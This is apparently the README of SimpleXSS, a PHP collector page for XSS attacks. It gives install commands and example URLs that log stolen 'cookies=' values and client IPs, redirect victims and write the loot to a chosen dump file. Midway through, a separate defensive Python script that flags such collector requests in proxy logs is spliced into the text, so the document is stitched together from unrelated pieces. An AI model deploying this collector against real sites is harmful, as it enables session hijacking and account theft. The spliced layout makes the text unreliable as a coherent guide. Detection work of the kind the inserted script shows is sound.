Simple index.php template to perform an XSS attack.
- Records every URL argument
- Records the client IP
- Instant redirection (static or dynamic)
- Web server (apache2, nginx, ...)
- PHP
In this guide I'm using apache2 on Debian 9. Obviously, you can use any web server and distro you want.
1. Install apache2 and php
apt install apache2 php
2. Get the sources
git clone https://github.com/bambish/SimpleXSS
3. Move index.php into the web server root directory
mv SimpleXSS/index.php /var/www/html
4. Give the web server group write access to the root directory so that dump files can be written there
chown root:www-data /var/www/html
chmod g+w /var/www/html
- Basic usage: cookies=12345&arg=67890
http://127.0.0.1/index.php?cookies=12345&arg=67890
You can use any argument names you like
- Dynamic redirection: redirect=http://arbitrarywebsite.com/
http://127.0.0.1/index.php?cookies=12345&arbitraryarg=67890&redirect=http://github.com/
You can change or disable the default redirection by editing or commenting out the $staticredirection variable in index.php
You can force the static redirection by setting $allowgetredirection to false in index.php
- Write in specific dump file: dumpfile=arbitraryfile.txt
http://127.0.0.1/index.php?cookies=12345&arbitraryarg=67890&dumpfile=arbitraryfile.txt
Be sure your web server has the access rights needed to create and edit files in the root dir
The default dump file is dumpfile.txt
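For defenders, the request shapes described above can be searched for in outbound proxy logs. The following Python script is an added example, not part of SimpleXSS; the log layout, the host names and the cookie-shape heuristic are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Control parameters named in this README; all other argument names are arbitrary.
CONTROL_PARAMS = {"redirect", "dumpfile"}
# Assumed heuristic: a value shaped like a cookie string ("name=value; name2=value2").
COOKIE_LIKE = re.compile(r"^[\w.-]+=[^;]+(;\s*[\w.-]+=[^;]*)*$")

def score_url(url):
    """Return the reasons a requested URL resembles a hit on such a collector."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    data_params = [name for name in params if name not in CONTROL_PARAMS]
    reasons = []
    redirect = params.get("redirect", [""])[0].lower()
    if data_params and redirect.startswith(("http://", "https://")):
        reasons.append("data argument plus absolute redirect target")
    if data_params and "dumpfile" in params:
        reasons.append("data argument plus dumpfile selector")
    for name in data_params:
        if any(COOKIE_LIKE.match(value) for value in params[name]):
            reasons.append(f"cookie-shaped value in '{name}'")
    return reasons

def scan(lines):
    """Yield (client_ip, url, reasons) for every log line worth triaging."""
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line
        client_ip, url = fields[1], fields[3]
        reasons = score_url(url)
        if reasons:
            yield client_ip, url, reasons

# Constructed sample proxy log, layout assumed: <timestamp> <client-ip> <method> <url>
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 GET http://collector.example/index.php?cookies=12345&arg=67890",
    "2024-01-01T10:00:01Z 10.0.0.6 GET http://collector.example/index.php?c=sid%3Dabc%3B%20theme%3Ddark&redirect=http://github.com/",
    "2024-01-01T10:00:02Z 10.0.0.7 GET http://collector.example/index.php?x=1&dumpfile=arbitraryfile.txt",
    "2024-01-01T10:00:03Z 10.0.0.8 GET http://intranet.example/search?q=report&page=2",
]

if __name__ == "__main__":
    for ip, url, reasons in scan(SAMPLE_LOG):
        print(ip, url, "; ".join(reasons))
```

The first sample line shows the limit of URL-shape matching: plain values with no control parameter look like any other request, so use the output as triage input alongside destination reputation.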
docker run -dit --name XSS -v /path/to/host/web/root/dir/:/var/www/html/ --publish 80:80 fauria/lamp
Adapt the root dir path if you don't use apache2, and give your Docker container write access to it
This XSS template was created for pentests and other legal uses (like bug bounty). Using this XSS template against a website without authorization is forbidden.
I'm not responsible for your usage of this XSS template. Use it at your own risk.